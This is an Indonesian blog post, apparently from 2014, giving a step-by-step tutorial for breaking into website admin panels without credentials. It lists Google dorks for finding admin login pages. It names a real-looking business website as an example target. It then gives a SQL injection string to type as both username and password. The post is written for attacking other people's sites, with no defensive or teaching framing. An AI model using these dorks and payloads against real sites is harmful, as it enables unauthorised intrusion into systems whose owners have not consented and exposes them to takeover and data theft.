Kamis, 06 Februari 2014

Tutorial Sederhana Bypass SQL Login

Bypass SQL Login - memanfaatkan eror pada sql website tersebut, kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat oleh pemilik/admin.

Dork yang dapat digunakan sebagai berikut :
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/

Berikut Tutorialnya/Langkah Langkahnya :

  • Silahkan masukkan dork tersebut ke google ( pilih salah satu ) : 
  • Lalu pilih target, contohnya seperti target berikut : http://www.hotairballoonridescolorado.com/adminpanel.php
  • Setelah Itu jika anda telah mendapatkan target silahkan anda coba login dengan menggunakan 
username :  ' or 1=1 limit 1 -- -+ 
password  : ' or 1=1 limit 1 -- -+
Screenshot :


  • Jika anda telah masuk adminnya maka anda telah berhasil hehe :D
  • Selesai...

0 komentar:

Posting Komentar